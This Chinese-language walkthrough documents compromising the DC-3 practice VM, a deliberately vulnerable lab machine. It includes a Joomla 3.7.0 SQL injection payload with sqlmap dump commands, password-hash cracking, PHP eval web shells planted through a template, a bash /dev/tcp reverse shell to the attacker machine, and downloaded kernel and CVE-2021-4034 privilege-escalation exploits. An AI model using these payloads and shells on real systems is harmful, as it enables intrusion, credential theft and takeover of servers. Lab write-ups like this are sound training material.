一.环境搭建

下载地址：

http://www.five86.com/downloads/DC-3-2.zip

下载不下来的可以用迅雷输入上面的网址进行下载

虚拟机配置：

切换连接桥接模式为nat模式，启动靶机，出现如下报错，进入虚拟机配置

选中CD/DVD，点击右小角的高级选项，选择IDE 0:0，点击确定

 启动虚拟机，如下图所示，启动成功

二.开始渗透

1.信息收集

首先第一步，找到靶机的ip地址，输入以下命令

arp-scan -l

可以看到靶机的ip地址为192.168.111.131，本机kali（攻击机）的ip地址为192.168.111.128 

 用nmap查看开放端口和服务

nmap -sV -p- 192.168.111.131

开启了一个http服务，访问一下这个地址

得到提示（我感觉不是提示） 

用工具扫描一下这个是什么cms

whatweb -v http://192.168.111.131

joomla cms，可以去网上查一下他的相关漏洞，根据其他大佬的文章，针对joomla有一个跟wpscan对wordpress一样的工具 ，叫做joomscan，下面的安装仅针对kali

apt-get install joomscan
joomscan --url http://192.168.111.131

得知他的目录信息，和版本号为3.7.0

利用searchsploit搜索相关漏洞

searchsploit joomla 3.7.0

2.漏洞利用

查看漏洞详情

 他给出了sqlmap的命令，往下翻可以看到利用的payload

http://192.168.111.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)

 我们进行测试，成功的话就可以放到sqlmap中自动化注入

 可以看到回显出了joomladb

使用sqlmap爆出库名（用网上这种一次次爆破的方式我的sqlmap会报错误）

用漏洞信息中自带的sqlmap进行操作（这玩意跑的是真的慢啊，我都想手测了）

sqlmap -u "http://192.168.111.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs

sqlmap -u "http://192.168.111.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --tables

 读入如下表，直接__users

sqlmap -u "http://192.168.111.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns

 最终把结果dump下来

 sqlmap -u "http://192.168.111.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C name,password --dump

 3.密码破解

我们可以看到数据库中的账号以及加密后的密码，使用john对密码进行破解

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

创建文件 

echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > test

爆破密码

john test
john test --show 

可以看到密码为snoopy

我们前面已经利用工具跑出了它的后台地址，用admin/snoopy进行后台登录

http://192.168.111.131/administrator/

登录成功

 4.写入shell

 在此处，可以通过模板向网站写入shell

点击一个模板进入，点击新建文件（new file）

<?php assert(@$_POST['a']); ?>

http://192.168.111.131/templates/beez3/shell.php

上面那个shell不知道为什么连不上，换下面这个 

<?php @eval($_POST['mlws']); ?> 

访问这个地址一片空白，用工具对shell进行连接

 5.进行提权

进行linux内核提权

uname -a
cat /etc/issue

寻找内核提权脚本

searchsploit Ubuntu 16.04

searchsploit -p 39772
cat /usr/share/exploitdb/exploits/linux/local/39772.txt

在文件中可以找到漏洞利用的exp地址

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

这个地址已经失效了，根据我查找其他的wp得知以下地址可以下载

https://www.zacarx.com/a/aa/39772.zip

 下载，解压，上传exploit.tar到目录下

我直接物理机下载拖拽到kali中，通过蚁剑上传到目录下

tar -xf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh

执行这个./compile.sh我这边会报错，但是不影响后面提权，最好还是操作一下（可能这个报错不影响编译） 

反弹一个交互式的shell

创建一个phpshell.php文件，写入

<?php
system("$sock=fsockopen(\"192.168.111.128\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");");
?>

 上面这个shell我在实践过程中无效

下面我提供一下自己生成的shell

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.111.128/4444 0>&1'");?>

在kali端起一个端口进行监听

nc -lvvp 4444

 在蚁剑端输入以下命令

php phpshell.php

 

成功反弹shell

执行刚刚上传的exp

./doubleput

成功提权为root（这个过程要等一段时间，他说等一分钟，等十几秒就好）

成功获得最终的flag 

三.其他

1.提权阶段可以使用CVE-2021-4034漏洞进行提权

CVE-2021-4034漏洞exp

GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day

利用脚本：https://www.zacarx.com/a/aa/CVE-2021-4034-main.zip

我们下载脚本

wget https://www.zacarx.com/a/aa/CVE-2021-4034-main.zip

一样上传到目录下，进行如下命令

unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main
make
./cve-2021-4034

但是我没试验成功，参考文章如下，感兴趣的师傅可以尝试一下，指出我操作的错误

【CTF】靶机：DC-3-阿里云开发者社区